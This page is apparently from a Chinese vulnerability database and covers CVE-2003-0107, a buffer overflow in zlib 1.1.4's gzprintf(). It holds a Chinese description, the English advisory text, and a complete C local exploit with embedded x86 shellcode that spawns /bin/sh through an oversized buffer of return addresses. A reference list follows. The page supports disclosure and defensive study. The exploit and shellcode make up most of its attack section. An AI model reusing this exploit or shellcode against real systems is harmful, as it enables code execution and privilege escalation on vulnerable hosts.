Zlib压缩库gzprintf()缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107216 漏洞类型 边界条件错误
发布时间 2003-02-23 更新时间 2007-04-06
CVE编号 CVE-2003-0107 CNNVD-ID CNNVD-200303-040
漏洞平台 Linux CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/22274
https://www.securityfocus.com/bid/6913
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200303-040
|漏洞详情
zlib是一款流行的压缩库,使用于多种应用程序中,包括有名的SSH实现。zlib的gzprintf()函数没有正确检查用户提供的数据,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以使用此函数的应用程序进程权限在系统上执行任意指令。zlib包含gzprintf()函数,类似fprintf(),如果提交给此函数的参数超过Z_PRINTF_BUFSIZE所定义的字节数(默认4096),可触发缓冲区溢出,精心构建提交的数据可能以使用此函数的应用程序进程权限在系统上执行任意指令。
|漏洞EXP
source: http://www.securityfocus.com/bid/6913/info
 
A buffer-overrun vulnerability has been reported in the Zlib compression library. Due to the use of 'vsprintf()' by an internal Zlib function, an attacker can cause memory to become corrupted. This buffer overrun occurs becuase the software fails to check the boundaries of user-supplied data given to the 'gzprintf()' function.
 
Successful exploitation of this vulnerability may allow an attacker to execute arbitrary instructions.
 
Note that only Zlib 1.1.4 has been reported vulnerable to this issue. It is not yet known whether earlier versions are also affected. 

C local exploit for zlib <= 1.1.4
/      just for fun..not for root :)
\
/   Usage: gcc -o zlib zlib.c -lz
\
/   by CrZ [crazy_einstein@yahoo.com] lbyte
[lbyte.void.ru]
*/


#include <zlib.h>
#include <errno.h>
#include <stdio.h>


int main(int argc, char **argv) {
        char shell[]=
                "\x90\x90\x90\x90\x90\x90\x90\x90"
                "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
                "\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
                "\xc0\x88\x43\x07\x89\x5b\x08\x89"
                "\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
                "\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
                "/bin/sh";
        gzFile f;
        int ret;
        long xret;
        char cret[10];
        char badbuff[10000];
        int i;

        sprintf(badbuff,"%p",shell);
        sscanf(badbuff,"0x%x",&xret);

        printf("[>] exploiting...\n");

        if(!(f = gzopen("/dev/null", "w"))) {
                perror("/dev/null");
                exit(1);
        }

        printf("[>] xret = 0x%x\n",xret);


sprintf(cret,"%c%c%c%c",(xret&0xff)+4,(xret>>8)&0xff,

(xret>>16)&0xff,(xret>>24)&0xff);

        bzero(badbuff,sizeof(badbuff));

        for(i=0;i<5000;i+=4) strcat(badbuff,cret);

        setuid(0);
        setgid(0);
        ret = gzprintf(stderr, "%s", badbuff );
        setuid(0);
        setgid(0);
        printf(">Sent!..\n");
        printf("gzprintf -> %d\n", ret);
        ret = gzclose(f);
        printf("gzclose -> %d [%d]\n", ret, errno);

        exit(0);
}
|受影响的产品
zlib zlib 1.1.4 + Caldera OpenLinux Server 3.1.1 + Caldera OpenLinux Server 3.1 + Caldera OpenLinux Workstation 3.1
|参考资料

来源:US-CERTVulnerabilityNote:VU#142121
名称:VU#142121
链接:http://www.kb.cert.org/vuls/id/142121
来源:XF
名称:zlib-gzprintf-bo(11381)
链接:http://www.iss.net/security_center/static/11381.php
来源:BUGTRAQ
名称:20030222bufferoverruninzlib1.1.4
链接:http://online.securityfocus.com/archive/1/312869
来源:BUGTRAQ
名称:20030223poczlibsploitjustforfun:)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104610337726297&w=2
来源:lists.apple.com
链接:http://lists.apple.com/mhonarc/security-announce/msg00038.html
来源:BID
名称:6913
链接:http://www.securityfocus.com/bid/6913
来源:REDHAT
名称:RHSA-2003:081
链接:http://www.redhat.com/support/errata/RHSA-2003-081.html
来源:REDHAT
名称:RHSA-2003:079
链接:http://www.redhat.com/support/errata/RHSA-2003-079.html
来源:OSVDB
名称:6599
链接:http://www.osvdb.org/6599
来源:MANDRAKE
名称:MDKSA-2003:033
链接:http://www.mandrakesoft.com/security/advisories?name=MDKSA-2003:033
来源:SUNALERT
名称:57405
链接:http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F57405
来源:GENTOO
名称:GLSA-200303-25
链接:http://marc.theaimsgroup.com